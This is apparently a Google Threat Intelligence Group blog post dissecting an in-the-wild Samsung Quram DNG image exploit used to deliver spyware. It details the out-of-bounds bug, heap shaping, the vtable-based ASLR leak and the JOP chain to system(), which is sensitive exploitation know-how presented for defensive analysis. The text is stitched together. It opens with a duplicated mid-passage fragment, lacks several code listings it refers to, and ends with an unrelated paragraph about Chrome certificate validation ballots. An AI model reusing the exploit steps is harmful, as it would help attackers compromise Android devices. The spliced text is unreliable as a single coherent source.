| | \-\---> Will prevent bailout in QuramDngOpcode::aboutToApply
\---> changed vtable pointer, from TrimBounds to MapTable
00007810: 0100 0000 0100 0000 0300 0000 0000 0000 // Arguments of bogus Maptable,
00007820: 0028 0000 0100 0000 982c 0000 0000 0000 // such as top, left, bottom, right,
00007830: 0100 0000 0100 0000 0100 0000 0000 0000 // plane, planes, ...
00007840: f0fc f8cc 7f00 0000 0600 0000 0100 0401
\-\--\-\--\-\--\-\----> vtable of the neighboring TrimBounds opcode, interpreted here
as the pointer to the MapTable's substitution table
The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.
Using the above technique, we can leak arbitrary values at offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied for other offsets (up to 65536, the maximum index into the substitution table).
Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:
But again, the exploit needs to support different library versions. These different library versions have pointers to leak at different offsets from the vtable. But based on the first leak at offset 0, we can “calculate” the right offsets to leak using another MapTable operation.
In summary the process goes as follows (illustrated below):
Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.
Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.
Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.
Posted by Benoît Sevens, Google Threat Intelligence Group
Introduction
Between July 2024 and February 2025, 6 suspicious image files were uploaded to VirusTotal. Thanks to a lead from Meta, these samples came to the attention of Google Threat Intelligence Group.
Investigation of these images showed that these images were DNG files targeting the Quram library, an image parsing library specific to Samsung devices.
On November 7, 2025 Unit 42 released a blogpost describing how these exploits were used and the spyware they dropped. In this blogpost, we would like to focus on the technical details about how the exploits worked. The exploited Samsung vulnerability was fixed in April 2025.
There has been excellent prior work describing image-based exploits targeting iOS, such as Project Zero’s writeup on FORCEDENTRY. Similar in-the-wild “one-shot” image-based exploits targeting Android have received less public documentation, but we would definitely not argue it is because of their lack of existence. Therefore we believe it is an interesting case study to publicly document the technical details of such an exploit on Android.
Attack vector
The VirusTotal submission filenames of several of these exploits indicated that these images were received over WhatsApp:
IMG-20240723-WA0000.jpg
IMG-20240723-WA0001.jpg
IMG-20250120-WA0005.jpg
WhatsApp Image 2025-02-10 at 4.54.17 PM.jpeg
The first filenames listed follow the naming scheme of WhatsApp on Android. The last filename is how WhatsApp Web names image downloads.
The first two images were received on the same day, based on the filename, potentially by the same target. Later analysis showed that the first image targets the jemalloc allocator, while the second one targets the scudo allocator, used on more recent Android versions. This blogpost will detail the scudo version of the exploit as this allocator is more hardened and relevant for recent devices. The concepts and techniques used in the jemalloc version are similar.
The final payload (as we’ll see later) indicates that the exploit expects to run within the com.samsung.ipservice process. How are WhatsApp and com.samsung.ipservice related and what is this process?
The com.samsung.ipservice process is a Samsung-specific system service responsible for providing "intelligent" or AI-powered features to other Samsung applications. It will periodically scan and parse images and videos in Android’s MediaStore.
When WhatsApp receives and downloads an image, it will insert it in the MediaStore. This means that downloaded WhatsApp images (and videos) can hit image parsing attack surface within the com.samsung.ipservice application.
However, WhatsApp does not intend to automatically download images from untrusted contacts. (WhatsApp on Android’s logic is a bit more nuanced though. More details can be found in Brendon Tiszka’s report of a different issue). This means that without additional bypasses and assuming the image is sent by an untrusted contact, a target would have to click the image to trigger the download and have it added to the MediaStore. This would mean this is in fact a “1-click” exploit. We don’t have any knowledge or evidence of the attacker using such a bypass though.
A curious image
Before we delve into the exploit, let’s gather an understanding of what type of file we are looking at.
Opcode List 3 : TrimBounds, DeltaPerColumn, DeltaPerColumn, DeltaPerColumn, ...
Subfile Type : Full-resolution image
Strip Offsets : 6596794
Strip Byte Counts : 1
...
(We truncated the “Opcode List” lines, since they contained thousands of opcodes in the actual exiftool output.)
Although the image was saved with a jpeg extension, this image is in fact a Digital Negative (DNG) image. According to Wikipedia:
Digital Negative (DNG) is an open source, lossless, well defined camera RAW data container with the goal to replace a range of proprietary, closed source raw image containers. It has been developed by Adobe.
…
DNG is based on the TIFF/EP standard format, and mandates significant use of metadata. The specification of the file format is open and not subject to any intellectual property restrictions or patents.
The image width and height look suspiciously small. And what are these opcode lists?
Some DNG format basics
The DNG format specification can be found on Adobe’s website.
DNG files use SubIFD trees, as described in the TIFF-EP specification, in order to contain multiple versions of the same image, such as a preview and a main image. This DNG file has 3 SubIFDs:
Type “Preview Image” with width 1 and length 1
Type “Main Image” with width 16 and length 16
Type “Main Image” with width 1 and length 1
As we mentioned already briefly, the sizes of these images are obviously very suspicious, as well as the fact that there are 2 “Main Image” types. We have not figured out what the purpose of the second main image is (if any).
DNG images can contain 3 “opcode lists”. As it will turn out, these “opcodes” will be very important in the context of this exploit. Their goal is to offload some processing steps from the camera to the DNG reader. Their intended use case is for example to perform lens corrections. The reason there are 3 opcode lists is because they are intended to be applied at different moments during the DNG decoding:
The raw image bytes are read from the DNG file, a.k.a. the “stage 1” image
Opcode list 1 specifies the list of opcodes that should be applied to the stage 1 image
The DNG decoder maps the raw image bytes to linear reference values, which results in a “stage 2” image.
Opcode list 2 specifies the list of opcodes that should be applied to the stage 2 image
The DNG decoder performs demosaicing of the linear reference values, which results in a “stage 3” image.
Opcode list 3 specifies the list of opcodes that should be applied to the stage 3 image.
Every opcode has an opcode ID and varying number and type of parameters. The latest specification (1.7.1.0 from September 2023), contains 14 distinct opcodes, with opcode IDs going from 1 to 14. Below is an example of opcode description found in the specification:
For this exploit, only 3 opcodes will be of interest:
TrimBounds (opcode ID 6): This opcode trims the image to a specified rectangle.
MapTable (opcode ID 7): This opcode maps a specified area and plane range of an image through a 16-bit lookup table.
DeltaPerColumn (opcode ID 11): This opcode applies a per-column delta (constant offset) to a specified area and plane range of an image.
DeltaPerColumn and MapTable perform transformations on areas (defined by a top, left, bottom and right parameter) and plane ranges (defined by a first plane and number of planes parameter).
Looking at the opcode lists in the exiftool output above, we already notice some suspicious things:
They use opcodes with opcode ID 23 (which exiftool can not map to an opcode name).
Typical benign DNG images will contain only a handful of opcodes, while for this image we have thousands of opcodes in the opcode lists.
Quram
As we mentioned before, the targeted process based on the payload is the Samsung firmware specific com.samsung.ipservice. The next question then becomes what code in this application performs the DNG decoding.
Looking at a decompiled com.samsung.ipservice APK (which on our test phone was located at /system/priv-app/IPService/IPService.apk), we can see that when the application parses a file with an extension of "jpg", "jpeg", "JPG" or "JPEG", it will call into the Java method com.quramsoft.images.QrBitmapFactory.decodeFile (bundled in the same APK).
BitmapdecodeFile2=QuramDngBitmap.decodeFile(str,options);// [2]; calls into Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI
if(options.outWidth<=0){
if(options.outHeight<=0){
returndecodeFile2;
}
}
options.outMimeType="image/dng";
returndecodeFile2;
}catch(IOExceptione2){
e2.printStackTrace();
returnnull;
}
}
The "Quram library" is a set of proprietary, closed-source software libraries used by Samsung on its Android devices. Its primary function is to process, parse, and decode various image formats. The library is not developed by Samsung itself. It is created by a third-party software vendor named Quramsoft. Mateusz Jurczyk already wrote about this library in 2020.
The QrBitmapFactory.decodeFile method will first try to decode the image using QuramBitmapFactory.decodeFile (see [1]), which calls the exported Java_com_quramsoft_images_QuramBitmapFactory_nativeDecodeFile2 function of the native library libimagecodec.quram.so. This function handles formats such as PNG, JPEG and GIF, but not DNG. This native library is not part of the IPService APK but rather located at /system/lib64/libimagecodec.quram.so.
When QuramBitmapFactory.decodeFile fails, QrBitmapFactory.decodeFile calls QuramDngBitmap.decodeFile as a fallback (see [2]), which then calls Java_com_quramsoft_images_QuramDngBitmap_DecodeDNGImageBufferJNI. This function will perform the complete DNG decoding and it is within this code path the vulnerability is triggered and the exploit fully executes.
A few tools came in handy when analysing this exploit, which we’ll describe next.
First of all, on the static analysis side, we need an overview of the different opcodes that are called with their parameters. exiftool only gives us a list of the (translated) opcode IDs. To inspect every opcode with its parameters, we can use the dng_validate tool provided by Adobe’s DNG SDK with the -v flag. It will parse the opcode lists and we can post-process its textual output to make sense of the thousands of opcodes. Here is a snippet of what the output looks like, showing us the different parameters of a few TrimBounds and DeltaPerColumn opcodes.
On the dynamic analysis side, debugging com.samsung.ipservice would be very annoying, since it only runs periodically (although there are tricks to force start it). For easier debugging, we reused @flankerhqd’s fuzzing harness (in part based on Project Zero’s SkCodecFuzzer), which loads a DNG file provided as a filename into a buffer and passes it to libimagecodec.quram.so’s QrDecodeDNGPreview. We compile it as a standalone binary and can run it under a debugger.
It is noteworthy that QrDecodeDNGPreview (used in our harness) is not the export called by com.samsung.ipservice (which ends up calling QuramDngDecoder::decode). However, if there is no preview image available with one of the JPEG compression types, QrDecodeDNGPreview will call QuramDngDecoder::decodePreview, which will also perform a full DNG decoding and successfully triggers the vulnerability and exploit.
Our test phone was a Samsung Galaxy S21 5G (SM-G991B) running firmware version G991BXXSAFXCL, which has a security patch level of 2024-04-01.
The bug
Using the dng_validate tool we can make a listing of the sequence of opcodes called and their number of repetitions:
The specification mentions that if the flag bit is set (which it is), opcodes with unknown opcode IDs should be skipped. So let’s for the moment ignore the “Unknown” opcodes with ID 23 (more on them later).
Let’s look at the first 2 known opcodes, which occur in opcode list 3:
$ grep -A8 TrimBounds dng_validate.out | head -n 8
The DNG opcode parameters are embedded directly in the file. DeltaPerColumn takes a list of deltas to be applied to each pixel and the "Area Spec" to work over: top, left, right, bottom coordinates, the plane and total number of planes being targeted, and the length of each row and column (rowPitch and colPitch). These values are controllable by the attacker.
The “first plane” (5125) and “number of planes” (5123) parameters of the DeltaPerColumn opcode are very suspicious. At stage 3 in the DNG decoding, the number of planes will be 3 (R, G and B), as can be seen in the CFA related data of the exiftool output. The first value (5125) is the first plane to apply the DeltaPerColumn to, while the second value (5123) is the number of planes. Since the planes are numbered 0 to 2, these values are clearly out of bounds.
Let’s have a look at QuramDngOpcodeDeltaPerColumn::processArea, which is the handler for the DeltaPerColumn opcode. Below are the relevant lines of that function for the vulnerability. (Variable names are chosen by us since this is a closed source library)
The function takes a few objects with Quram specific structure as arguments. The QuramDngImage describes the image on which the opcode is to be applied (which is the stage 3 image at this point). The QuramDngOpcode contains the DeltaPerColumn parameters. The function has a triple nested loop to iterate over the width, length and planes of the area. For every such triplet (width,length,plane) it calculates the offset in the raw pixel buffer and adds a delta to it. Only the plane loop is relevant for the bug and displayed in the code above.
Below is an example of a 6x6 image with its different color planes and to what offsets the pixel values map in the raw pixel buffer. During stage 2 and stage 3 image processing, each pixel value in each color plane takes 16 bits.
There are two issues in that handler function:
opcode_last_plane is calculated incorrectly. It should be opcode_first_plane + opcode_number_of_planes (as will be the case in the patched version). This by itself is a correctness issue (and a pretty basic one that would be expected to surface by normal usage or testing of the library).
The plane used in the offset calculation is bounded by opcode_last_plane, but at no point is it checked that opcode_last_plane is within the number of planes that the image contains.
The actual values from the exploit are annotated as comments in the code snippet. With these values, the plane loop will be executed exactly once. The width and length loop will also be executed only once, since t=0, l=0, b=1, r=1. This means exactly one write will happen. Since the stage 3 image in the exploit has a width 1 and length 1, the write will happen at offset 5125 x 2 = 10250 from the raw pixel buffer.
Not only the offset of the write is controlled, the value to be added to the current value in the raw pixel buffer is also fully controlled, since it is an opcode parameter. In this case it is 26214.0 (or 0x6666). This vulnerability gives thus a very strong primitive from the start: the attacker can add chosen values at chosen offsets with respect to the raw pixel buffer.
Now why do we need that TrimBounds opcode before triggering the bug? That will become clear when we discuss the heap shaping strategy.
Exploit flow
Heap shaping strategy
Since the buffers containing the pixel values are dynamically allocated on the heap, it is important to understand what heap allocations the Quram library makes and how these allocations behave to understand the heap layout at the time of the vulnerability triggering.
As we mentioned earlier, exploits exist for Android versions using both jemalloc and scudo allocator. We will analyse the exploit targeting the scudo allocator, since this is the common allocator on modern Android versions. The same techniques were used in a different way in the jemalloc exploit.
Scudo
We will not give a detailed overview of Android’s scudo allocator, which is being used here for the allocations, since excellent documentation by Synacktiv already exists, to which we refer. We will only mention the elements that are important for this exploit.
Scudo allocates objects in different heap regions depending on the allocation size. For two objects of different types to land near each other, they need to belong to the same size class. The size required from the allocator’s point of view for a “block” is composed of:
A header of 0x10 bytes
The chunk with the user requested size. A pointer to the chunk is returned to the caller.
New allocations are retrieved via “transfer batches”. The number of allocations in a transfer batch depends on the size class. For the size we will be interested in (chunks of 0x30 bytes, i.e. blocks of 0x40 bytes), there are 52 allocations in a transfer batch. The allocations within a transfer batch are returned in a randomized order, however subsequent transfer batches are just laid out linearly in memory. A consequence of this is that given enough allocations between two allocations of the same size, an attacker can be confident that the last allocation falls after the first allocation.
Lastly, scudo supports a quarantine mechanism that prevents freed allocations to be returned immediately on a next allocation request. However on Android this quarantine mechanism is disabled. The consequence is that a freed object will be directly reallocated on the next allocation request of the same size.
Quram’s heap allocations
With a basic understanding of scudo’s allocation behaviour, let’s look at the specific heap allocations Quram makes when decoding a DNG file.
First, when Quram parses the opcode lists in the DNG file, it will allocate one QuramDngOpcode object per opcode. These objects contain the parameters of the opcode, as well as a vtable pointer to the handlers for that opcode. The size of such an object depends thus on the number and type of parameters and hence on the type of opcode. The size of the different opcodes can be looked up in QuramDngDecoder::makeDngOpcode. For the exploit at hand, only the following opcode sizes are relevant:
DeltaPerColumn (opcode ID 11): 0x50 bytes
MapTable (opcode ID 7): 0x50 bytes
TrimBounds (opcode ID 6): 0x30 bytes
Unknown (starting at opcode ID 14, such as opcode ID 23 in the exploit): 0x30 bytes
This means TrimBounds and Unknown opcodes will land in the same heap region, distinct from the heap region containing the DeltaPerColumn and MapTable opcodes.
Next, for every stage image, Quram will allocate three heap buffers:
A QuramDngImage of fixed size 0x30, which describes the image
A buffer for the pixel values of variable size (depending on width, height and number of planes)
A QuramDngPixelBuffer of fixed size 0x40, which describes the contents of the buffer
These different objects and their relationship are illustrated below:
There are two “pixel buffers” at play here, which can be a bit confusing: the QuramDngPixelBuffer object and the raw buffer with pixel values. In what comes, when we talk about “raw pixel buffer”, we refer to the latter.
QuramDngImage and QuramDngPixelBuffer will land in different heap regions since they belong to different scudo allocation class sizes. The raw pixel buffer may end up in the same heap region as a QuramDngImage depending on its size. Its size is calculated by ComputeBufferSize. For the dimensions of the stage 3 image of the exploit (width 1 by length 1 with 3 color planes) it will calculate a size of 0x30 bytes (even though 6 bytes would suffice). For the stage 1 and stage 2 images, the sizes are different and will be allocated in a different heap region.
To conclude, both the TrimBounds opcodes, the Unknown opcodes, the QuramDngImage objects as well as potentially the raw pixel buffer will end up in the same heap region.
Final heap layout
We can now study the sequence of events during DNG decoding to understand the heap layout at the time of the vulnerability trigger:
QuramDngDecoder::getRegionStage1Image will allocate a “stage 1” QuramDngImage (size 0x30)
QuramDngDecoder::readStage1Image parses the 3 opcode lists and allocates a QuramDngOpcode structure per opcode. As we saw, only TrimBounds and Unknown opcodes will land in the same heap region of 0x30 bytes chunks, which is of interest to us. Other opcodes are allocated in different heap regions.
QuramDngDecoder::buildStage2Image will apply opcode list 1. When it is done, the 20000 unknown opcodes it contains are freed.
QuramDngDecoder::doBuildStage2 will allocate a QuramDngImage “stage 2” (size 0x30) and convert stage 1 to stage 2. This stage 2 image will take the spot of the last opcode of opcode list 1 that was freed.
QuramDngDecoder::buildStage2Image can now free the “stage 1” QuramDngImage. It will then process the opcode list 2, and free the 240 “unknown” opcodes.
QuramDngDecoder::doInterpolateStage3 will allocate both a new “stage 3” QuramDngImage (size 0x30) and subsequently a raw pixel buffer of size 0x30. These will take the spots of the last 2 opcodes freed from opcode list 2 in the previous step.
QuramDngDecoder::buildStage3Image can now free the “stage 2” QuramDngImage.
Opcode list 3 gets processed now. In the first TrimBounds opcode, QuramDngOpcodeTrimBounds::doApply will allocate a new raw pixel buffer of size 0x30 (although the replaced raw pixel buffer has the exact same size). This allocation will take the spot of the freed stage 2 image.
Note that the 640 other TrimBounds opcodes have a “minVersion” of 1.4.0.1. This is a trick that will make QuramDngOpcode::aboutToApply bail out early and not have the TrimBounds actually executed. The goal of spraying these 640 TrimBounds opcodes will become clear later.
The eventual heap layout for chunks of size 0x30 is illustrated below. The annotated offsets will be important later on.
Note that because of scudo’s randomization strategy, the allocations of different opcode lists will actually overlap slightly (on the order of 52 allocations), but given enough allocations this effect can be neglected.
Because the allocations have chunk sizes of 0x30 bytes, they take up 0x40 bytes on the heap. Different chunks in this heap region are thus spaced by multiples of 0x40 bytes, which will help us in quickly inferring what parts of an object are being corrupted. The illustration also depicts the sizes the allocations occupy in total, which will be important for understanding the subsequent exploitation flow.
As we’ll see, the exploit will write out of bounds from the raw pixel buffer of stage 3 into the QuramDngImage of stage 3. This explains why the attackers first used a TrimBounds opcode before triggering the bug: it assures that the raw pixel buffer will end up before the QuramDngImage. Without it, there would be a one out of two chance that the raw pixel buffer takes a spot after the QuramDngImage.
The initial corruption
After achieving the right heap layout using the TrimBounds, 480 DeltaPerColumn opcodes follow. As a reminder, these are allocated in a different heap region because of a different allocation size. As discussed, DeltaPerColumn opcodes are able to add arbitrary values to arbitrary offsets out of bounds. The attackers add 0x6666 to offsets 10 and 12 within 240 heap objects, starting at offset 0x2800 from the raw pixel buffer and ending at offset 0x6400.
Looking at our heap layout, we will corrupt three types of objects at these offsets:
Unknown and TrimBounds opcodes: opcode structures contain the opcode ID at offset 8 and the specification version at offset 12. Since the opcode IDs will be corrupted, these TrimBounds and Unknown opcodes will simply be skipped later on (which was already the case for the Unknown opcodes).
Most importantly, it will encounter the QuramDngImage object. The two corrupted fields of this object are the “bottom” and “right” fields of the image, which are used in other opcode handlers for verifying if operations are within bounds. This means that we can now use other opcodes, such as MapTable, to perform actions out of bounds.
If we look for example at the first MapTable that follows, it looks like:
Opcode:MapTable,minVersion=1.4.0.0,flags=1
AreaSpec:t=0,l=5120,b=1,r=5121,p=0:1,rp=1,cp=1
Count:65536
Under regular circumstances, the “left” and “right” value would be out of bounds and this opcode would not perform any operation. Because we corrupted the dimensions of the QuramDngImage though, this opcode will operate out of bounds.
Extending the primitives
Incrementing arbitrary out of bound values with chosen values is a powerful primitive, but the exploit will also want to write absolute arbitrary values out of bounds. The former can be converted pretty easily into the latter though.
If we have a primitive to write zeros out of bounds, we can combine that with the increment primitive to write arbitrary values in two steps: zero the memory and then increment it with the value we want to write.
Zeroing memory can be done in two ways, and both are used in the exploit:
Using the MapTable opcode with a substitution table of all zeros
Using the DeltaPerColumn opcode. The “Delta” parameter is a float, and -Infinity is supported, which sets the resulting value to 0.
In the exploit, MapTable is only used to zero large regions, likely because of the large space overhead of the MapTable opcode (as it requires a substitution table of 65536 values to be included).
Crafting a bogus MapTable opcode
With linear out-of-bounds write primitive in place, the exploit could now:
Write a shell command somewhere out of bounds
Write a JOP gadget chain somewhere out of bounds which ends up calling system()
Overwrite the vtable pointer of one of the opcode objects to be executed to kick off the JOP chain, resulting in a system(<shell command>) execution
There is one important issue though: we don’t know any of the required addresses, since both the heap and the libraries are subject to ASLR. To leak the addresses of the JOP gadgets, the exploit has to do a bit more work.
Let’s show the first MapTable opcode again:
Opcode:MapTable,minVersion=1.4.0.0,flags=1
AreaSpec:t=0,l=5120,b=1,r=5121,p=0:1,rp=1,cp=1
Count:65536
This opcode will act on offset 5120 x 2 bytes/pixel x 3 colors/pixel = 0x7800 from the raw pixel buffer, which is in the region of those 641 TrimBounds opcodes.
It is corrupting the lower 2 bytes of the vtable pointer of a TrimBounds opcode object. Looking at the substitution table, most values are mapped to itself, however a few are not. (We had to write an additional script to parse this out, since dng_validate’s output of these long substitution tables is truncated).
For example, the value 0xecf0 is mapped to 0xed30. Looking at the libimagecodec.quram.so binary, the new address points to the MapTable vtable. This trick allows the attackers to “type confuse” a TrimBounds opcode to a MapTable opcode, by moving the vtable pointer to a different one, without having to leak any ASLR first.
Their substitution table supports different versions of the library, which works because there are not that many versions of the library (the exploit supports 7 versions) and the lower bytes of the vtable do not collide. Moreover, since ASLR is applied at page level granularity, they need to account for every page multiple the vtable can be mapped at. Say we have the following vtable offsets:
libimagecodec.quram.so version x
libimagecodec.quram.so version y
QuramDngOpcodeTrimBounds vtable offset
0x2dccf0
0x2dce10
QuramDngOpcodeMapTable vtable offset
0x2dcd30
0x2dce50
Then the following MapTable substitution table would be constructed (omitting values that don’t matter and can map to whatever):
index : value
0x0cf0 : 0x0d30
0x0e10 : 0x0e50
0x1cf0 : 0x1d30
0x1e10 : 0x1e50
0x2cf0 : 0x2d30
0x2e10 : 0x2e50
0x3cf0 : 0x3d30
0x3e10 : 0x3e50
0x4cf0 : 0x4d30
0x4e10 : 0x4e50
0x5cf0 : 0x5d30
0x5e10 : 0x5e50
0x6cf0 : 0x6d30
0x6e10 : 0x6e50
0x7cf0 : 0x7d30
0x7e10 : 0x7e50
0x8cf0 : 0x8d30
0x8e10 : 0x8e50
0x9cf0 : 0x9d30
0x9e10 : 0x9e50
0xacf0 : 0xad30
0xae10 : 0xae50
0xbcf0 : 0xbd30
0xbe10 : 0xbe50
0xccf0 : 0xcd30
0xce10 : 0xce50
0xdcf0 : 0xdd30
0xde10 : 0xde50
0xecf0 : 0xed30
0xee10 : 0xee50
0xfcf0 : 0xfd30
0xfe10 : 0xfe50
Using the previously described arbitrary write primitive, the exploit also corrupts various fields of the TrimBounds object to transform it into a functional bogus MapTable object. Note that a regular MapTable opcode object is bigger than a TrimBounds opcode and would hence also land in a different scudo heap class in normal circumstances. Obviously, the library is unaware and will just read opcode arguments out of bounds in this case.
The constructed bogus MapTable opcode object looks like this:
\-\--\-\--\-\--\-\----> vtable of the neighboring TrimBounds opcode, interpreted here
as the pointer to the MapTable's substitution table
The whole goal of this construction is to have the vtable of another opcode object as the pointer for the MapTable substitution table. If we zero out the memory this MapTable will be applied to beforehand, this will result in a read of two bytes from the TrimBounds vtable, i.e. a leak.
Using the above technique, we can leak arbitrary values at offsets from the TrimBounds vtable. We demonstrated this for offset 0, but the same idea can be applied for other offsets (up to 65536, the maximum index into the substitution table).
Say you want to leak a pointer at offset 0x1f8 from the TrimBounds vtable. This can be achieved in the following way:
But again, the exploit needs to support different library versions. These different library versions have pointers to leak at different offsets from the vtable. But based on the first leak at offset 0, we can “calculate” the right offsets to leak using another MapTable operation.
In summary the process goes as follows (illustrated below):
Corrupt a TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
Have the bogus MapTable opcode process an area of all zeros. The substituted values will be the lower 2 bytes of the first vtable entry (which is the address of QuramDngOpcode::~QuramDngOpcode()). The top nibble will depend on the ASLR slide, and the lower 3 nibbles will be version dependent.
Using MapTable opcodes with well prepared substitution tables (supporting different ASLR slides and library versions), substitute those values to the offset between the TrimBounds vtable and the address of the pointer to leak.
Similar to step 1, corrupt another TrimBounds opcode into a MapTable object with the substitution table pointing at the TrimBounds vtable.
The bogus MapTable will now substitute the offsets from the vtable into their respective values, effectively writing a leaked pointer into memory.
The memory used for preparing these pointers is at offset 0xf000 from the raw pixel buffer, which contains the last series of 1040 “unknown” opcodes. This memory will become the JOP chain.
The leaked pointers are mostly pointers to functions inside libimagecodec.quram.so, as well as the value of libc’s __system_property_get, which is located in the GOT. Conveniently the .got segment is located after the TrimBounds’s vtable, and within a 65536 bytes offset.
Preparing the payload
By using more MapTable operations, we can change the leaked pointers to the JOP gadget addresses we are interested in. The leaked libc pointer is changed to the address of system.
This is an overview of the leaked pointers and to what they are changed:
A long shell command is also prepared at offset 0x10000 from the raw pixel buffer, which also falls in that 1040 Unknown opcodes region.
We end up with:
a JOP chain prepared at 0xf000. Note that it is preceded by one of the 1040 Unknown opcodes with opcode ID 23 (0x17)
a shell command at offset 0x10000. Note again how it is within the region of the Unknown opcodes
Triggering the JOP chain
Similar to our initial corruption, we increment values between 0x2800 and 0x6400 with 1, but this time at offset 0x22 within the objects, using DeltaPerColumn opcodes. The opcode objects there have been executed by now, so this does not affect them. However, the QuramDngImage is also there and offset 0x20 in the QuramDngImage is a pointer to the raw pixel buffer. By adding 1 to offset 0x22, we basically shift the raw pixel buffer pointer with 0x10000 bytes, pointing it right at the shell command.
Finally, the DNG decoder will execute that last series of 1040 “unknown” opcodes. Offset 0xf000 - where we prepared our JOP chain - falls nicely on the boundary of one of those opcodes, so it will be executed as another opcode.
QuramDngOpcode::aboutToApply reads the bogus vtable pointer at raw pixel buffer offset 0xf000 and calls the fourth function in it, which will be qpng_read_data.
.got:00000000002E33A8qpng_read_data_ptrDCQqpng_read_data // bogus vtable entry that will be called
When qpng_read_data gets called, x0 will point to the opcode, as it is a method call. x1 points to the decoder, but is not important for the JOP chain. x2 is not specifically set up for this function call, but it still points to the QuramDngImage from QuramDngOpcodeList::doApply higher up the stack (it has not been clobbered). x2 pointing to the QuramDngImage is important for the JOP chain.
qpng_read_data will move x0 into x19 and call the next gadget, __ink_jpeg_enc_process_image_data+64.
We jump in the middle of __ink_jpeg_enc_process_image, which adds 0x20 to the QuramDngImage pointer, having x1 point at the address that contains the raw pixel buffer pointer:
We execute a second time the __ink_jpeg_enc_process_image+64 gadget, which copies the raw pixel buffer pointer into x0 and calls system. The raw pixel buffer was corrupted before the JOP chain to point at the shell command, resulting in a system(<shell_command>) call.
__ink_jpeg_enc_process_image+64:
0000000000161664LDRX8,[X19,#0x928];x19:address of shell command
;x8:system
0000000000161668ADDX1,X20,#0x20
000000000016166CMOVX0,X19;x0: address of shell command
0000000000161670BLRX8;system
Below is a summary of the sequence of gadgets and their purpose:
Gadget
Relevant instructions
Purpose
qpng_read_data
MOV X19, X0
MOV X20, X2
Copy the opcode address into x19 and the QuramDngImage address into x20
__ink_jpeg_enc_process_image_data+64
ADD X1, X20, #0x20
Have x1 point at QuramDngImage+0x20 (which contains the raw pixel buffer pointer)
QURAMWINK_Read_IO2+124
LDR X1, [X1]
Dereference x1, so it contains the raw pixel buffer pointer
qpng_check_IHDR+624 → qpng_error
MOV X19, X1
Copy the raw pixel buffer pointer from x1 into x19
__ink_jpeg_enc_process_image+64
LDR X8, [X19,#0x928] MOV X0, X19 BLR X8
Copy the raw pixel buffer from x19 into x0 and call system. The raw pixel buffer was corrupted before the JOP chain to point at the shell command
It searches through all WhatsApp images for itself (using a unique string)
It unzips b.so from itself into /data/data/com.samsung.ipservice/files/b.so. Effectively, it is a polyglot of a DNG and ZIP file.
Note that only the com.samsung.ipservice process is allowed to write here, which confirms this is the targeted process.
The second-to-last command contains the following service_flag URL decoded: update files SET serviceflag= serviceflag|66304 . That last value (0x10300) is a flag bitmask that will set the IPService, FaceService and StoryService in com.samsung.cmh’s files table. These flags are used by the different services to track which files they need to process (flag bit set to 0) and have already processed (flag bit set to 1). The likely objective of the attackers here is to prevent future reparsing by these services of the images.
Finally it runs b.so, the agent.
Fix
Curiously, this issue was silently fixed in Samsung’s April 2025 updates. In September 2025, a CVE was assigned (CVE-2025-21042) by Samsung and the security bulletin updated. Note that not all supported Samsung devices are serviced monthly security updates. Some devices are part of a quarterly or biannual security update schedule, which means they might have received the fix at a later date. On December 11, 2025, Samsung told us the following: "patches for SVE-2025-1959 have been deployed to all devices supported by Security Update, without exception."
The fixed function now looks like below (simplified version). The bold parts are the added checks.
...// Add delta to the value in the raw pixel buffer at offset corresponding to plane `current_plane`
current_plane++;
}
while(current_plane < opcode_last_plane
&& current_plane < image_number_of_planes );
...
}
As we can see from the fix:
The opcode_last_plane is now calculated correctly.
Before dereferencing the raw pixel buffer, a check is performed that the current_plane is within the number of planes of the image.
Mitigations
Except for some ASLR bypassing tricks and a little bit of JOP work, no mitigations posed a significant hurdle for the attackers:
No control flow integrity mitigations, like PAC or BTI, are compiled into the Quram library. This allowed the attackers to use arbitrary addresses as JOP gadgets and construct a bogus vtable.
The “hardened” scudo allocator wasn’t an obstacle either. The heap spraying primitives - more or less inherent to the DNG format - are quite powerful and allow for a well predicted heap layout, even in the presence of scudo’s randomization strategy. The absence of the quarantine feature is also convenient to deterministically reclaim the spot of the stage 2 image.
MTE would likely have prevented both:
the initial vulnerability trigger to corrupt the image dimensions
the hundreds of subsequent out of bounds MapTable and DeltaPerColumn operations
preventing reliable exploitation of this vulnerability, at least with the current exploit strategy.
Conclusion
This case illustrates how certain image formats provide strong primitives out of the box for turning a single memory corruption bug into interactionless ASLR bypasses and remote code execution. By corrupting the bounds of the pixel buffer using the bug, the rest of the exploit could be performed by using the “weird machine” that the DNG specification and its implementation provide.
The bug exploited in this case is quite shallow and could have been found manually or through fuzzing. As Project Zero’s Reporting Transparency illustrates, several other vulnerabilities in the same component have been discovered.
These types of exploits do not need to be part of long and complex exploit chains to achieve something useful for attackers. By finding ways to reach the right attack surface and using a single vulnerability, attackers are able to access all the images and videos of an Android’s media store, which is a very interesting capability for spyware vendors.
I would like to thank everyone who contributed to this analysis:
Meta for the initial leads
Brendon Tiszka of Google Project Zero for the research on how the com.samsung.ipservice attack surface can be reached and the followup research he performed into the Quram library, leading to several more discoveries.
Clement Lecigne of Google Threat Intelligence Group for assisting in the analysis
Secure connections are the backbone of the modern web, but a certificate is only as trustworthy as the validation process and issuance practices behind it. Recently, the Chrome Root Program and the CA/Browser Forum have taken decisive steps toward a more secure internet by adopting new security requirements for HTTPS certificate issuers.
These initiatives, driven by Ballots SC-080, SC-090, and SC-091, will sunset 11 legacy methods for Domain Control Validation. By retiring these outdated practices, which rely on weaker verification signals like physical mail, phone calls, or emails, we are closing potential loopholes for attackers and pushing the ecosystem toward automated, cryptographically verifiable security.
